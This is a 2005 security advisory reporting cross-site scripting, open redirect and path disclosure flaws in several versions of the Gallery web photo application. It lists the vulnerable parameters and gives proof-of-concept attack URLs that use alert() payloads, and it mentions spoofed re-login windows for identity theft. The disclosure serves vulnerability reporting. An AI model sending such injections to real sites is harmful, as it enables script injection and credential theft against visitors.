Gallery134.txt

2005-01-18T00:00:00
ID PACKETSTORM:35794
Type packetstorm
Reporter Rafel Ivgi
Modified 2005-01-18T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: Gallery  
Vendors: http://gallery.sourceforge.net  
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha  
Platforms: Windows  
Bug: Cross Site Scripting Vulnerability  
Exploitation: Remote With Browser  
Date: 17 Jan 2005  
Author: Rafel Ivgi, The-Insider  
E-Mail: the_insider@mail.com  
Website: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
Gallery is open to Cross Site Scripting vulnerability, allowing a remote  
attacker to inject and execute scripts on the user’s machine while visiting  
a remote gallery.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the  
‘index’ field. The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">  
<script>alert()</script>  
  
  
Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’  
in ALL the fields. The ‘slideshow_low.php’ contains the following form  
fields:  
set_albumName  
slide_index  
slide_full  
slide_loop  
slide_pause  
slide_dir  
  
The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_  
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl  
ide_dir=1  
  
Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the  
‘username’ field. The injection can be done using hex encoded tag closing  
and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
  
For Example:  
http://<valid  
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"  
  
  
  
Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the  
‘username’ field.  
The injection can be done using hex encoded tag closing and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20  
onactivate%3Dalert%28%29%3e  
This version of Gallery also has an open redirection, which is a security  
risk because  
an attacker can send someone a link with a redirection to his evil host name  
or to cause  
the user to commit an attack or waste a target’s resources.  
  
For Example:  
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape  
encoded evil  
host name>&cmd= All the vulnerabilities described above can be used to  
remotely call  
a JavaScript file The injected JavaScript code is responsible for:  
Automatic launching of malicious code (remote compromise by I.E exploits).  
Identity theft using a spoofed re-login window (only for galleries with  
login)  
  
Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the  
‘g2_form[subject]’  
field. The injection can be done using an inline javascript protocol call:  
javascript:alert()  
  
For Example:  
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2  
_form[formName]=AddComment&g2_itemId=<valid  
item>&g2_form[subject]=[img]javascript:alert  
()[/img]&g2_form[action][preview]=preview  
  
Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the  
‘g2_subView’ parameter. It is possible the replace any valid subView value  
such as: comment  
:ShowComments with the admin value: core:UserAdmin. This causes the gallery  
to wait 30 seconds  
and then print out the Full Path of the gallery on the server.  
  
For Example:  
http://<valid host>/g2/main.php?g2_return= http://<valid  
host>/main.php%3Fg2_view%3Dcore  
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session  
id such as:  
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core  
:UserAdmin  
  
Then the following data will be printed out to the attacker:  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/mnt/1/<name>/www/<host>/g2/  
modules/core/UserAdmin.inc on line 55  
  
Second Time  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/mnt/1/<name>/www/<host>/g2/  
modules/core/classes/GalleryUtilities.class on line 596  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
Gallery v1.3.4-pl1  
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al  
ert()</script>  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s  
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>  
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"  
  
Gallery v1.4.4-pl2  
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*  
/%20onactivate%3Dalert%28%29%3e<plaintext>  
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww  
.google.com&cmd=  
  
Gallery v2.0 Alpha  
  
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2  
_form[formName]=AddComment&g2_itemId=<valid  
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview  
]=preview  
  
2)  
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%  
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3  
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am  
p;g2_view=core:UserAdmin&g2_subView=core:UserAdmin  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
  
`